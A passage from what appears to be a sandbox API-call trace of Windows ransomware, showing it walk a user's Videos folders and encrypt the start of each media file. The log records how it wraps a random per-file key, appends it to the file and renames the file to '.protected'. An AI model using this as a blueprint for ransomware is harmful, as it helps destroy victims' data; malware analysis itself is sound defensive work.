pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z") returned 62 [0092.840] lstrcmpW (lpString1="KyM4mWn F0k Z", lpString2=".") returned 1 [0092.840] lstrcmpW (lpString1="KyM4mWn F0k Z", lpString2="..") returned 1 [0092.840] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\*") returned 64 
[0092.840] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.840] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.840] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.840] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.840] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\.") returned 64 [0092.841] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.841] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.841] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.841] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.841] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\..") returned 65 [0092.841] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.841] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.841] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="Windows") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="Program Files") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", 
lpString2="Program Files (x86)") returned -1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="$Recycle.bin") returned 1 [0092.841] lstrcmpiW (lpString1="6vmo3S2K.flv", lpString2="System Volume Information") returned -1 [0092.841] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.841] StrStrIW (lpFirst="6vmo3S2K.flv", lpSrch=".protected") returned 0x0 [0092.841] lstrcmpW (lpString1="6vmo3S2K.flv", lpString2="RESTORE_FILES.txt") returned -1 [0092.841] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.841] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".txt") returned 0x0 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".rar") returned 0x0 [0092.842] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv") returned 75 [0092.842] StrStrW (lpFirst="6vmo3S2K.flv", lpSrch=".zip") returned 0x0 [0092.842] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.843] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.843] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.843] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.843] CloseHandle (hObject=0xd8) returned 1 [0092.843] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv.protected") returned 85 [0092.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\6vmo3S2K.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\6vmo3s2k.flv.protected")) returned 1 [0092.845] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.845] lstrcmpiW 
(lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Windows") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Program Files") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="Program Files (x86)") returned -1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="$Recycle.bin") returned 1 [0092.845] lstrcmpiW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="System Volume Information") returned -1 [0092.845] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.845] StrStrIW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".protected") returned 0x0 [0092.845] lstrcmpW (lpString1="LL1b9BnwX3kr O82pKyV.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0092.845] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.845] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".txt") returned 0x0 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW 
(lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".rar") returned 0x0 [0092.846] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4") returned 87 [0092.846] StrStrW (lpFirst="LL1b9BnwX3kr O82pKyV.mp4", lpSrch=".zip") returned 0x0 [0092.846] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.847] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.847] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.847] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.847] CloseHandle (hObject=0xd8) returned 1 [0092.847] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4.protected") returned 97 [0092.847] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\LL1b9BnwX3kr O82pKyV.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ll1b9bnwx3kr o82pkyv.mp4.protected")) returned 1 [0092.848] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Windows") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Program Files") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="Program Files (x86)") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="$Recycle.bin") returned 1 [0092.848] lstrcmpiW (lpString1="ybqFAe", lpString2="System Volume Information") returned 1 [0092.848] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe") returned 69 [0092.848] lstrcmpW (lpString1="ybqFAe", lpString2=".") returned 1 [0092.848] lstrcmpW (lpString1="ybqFAe", lpString2="..") returned 1 [0092.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\*") returned 71 [0092.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.848] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\.") returned 71 [0092.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.849] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.849] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.849] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.849] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\..") returned 72 [0092.849] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.849] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Windows") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Program Files") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="Program Files (x86)") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="$Recycle.bin") returned 1 [0092.849] lstrcmpiW (lpString1="Y nUB9q56w-iEWWqWD.mkv", lpString2="System Volume Information") returned 1 [0092.849] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.849] StrStrIW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".protected") returned 0x0 [0092.849] lstrcmpW (lpString1="Y nUB9q56w-iEWWqWD.mkv", 
lpString2="RESTORE_FILES.txt") returned 1 [0092.849] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.849] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.849] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".txt") returned 0x0 [0092.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".rar") returned 0x0 [0092.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv") returned 92 [0092.850] StrStrW (lpFirst="Y nUB9q56w-iEWWqWD.mkv", lpSrch=".zip") returned 0x0 [0092.850] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.850] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | 
out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.850] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.850] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.851] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.851] CloseHandle (hObject=0x14c) returned 1 [0092.851] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv.protected") returned 102 [0092.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\Y nUB9q56w-iEWWqWD.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\y nub9q56w-iewwqwd.mkv.protected")) returned 1 [0092.853] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Windows") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Program Files") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="Program Files (x86)") returned 1 [0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="$Recycle.bin") returned 1 
[0092.853] lstrcmpiW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="System Volume Information") returned 1 [0092.853] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrIW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".protected") returned 0x0 [0092.853] lstrcmpW (lpString1="ypDvKe-RFjVL59JS.flv", lpString2="RESTORE_FILES.txt") returned 1 [0092.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".txt") returned 0x0 [0092.853] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.853] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".rar") returned 0x0 [0092.854] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv") returned 90 [0092.854] StrStrW (lpFirst="ypDvKe-RFjVL59JS.flv", lpSrch=".zip") returned 0x0 [0092.854] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, 
lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.854] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.854] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.855] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.855] CloseHandle (hObject=0x14c) returned 1 [0092.855] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv.protected") returned 100 [0092.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6pYE9WW\\KyM4mWn F0k Z\\ybqFAe\\ypDvKe-RFjVL59JS.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6pye9ww\\kym4mwn f0k z\\ybqfae\\ypdvke-rfjvl59js.flv.protected")) returned 1 [0092.856] FindNextFileW (in: hFindFile=0x47ba50, 
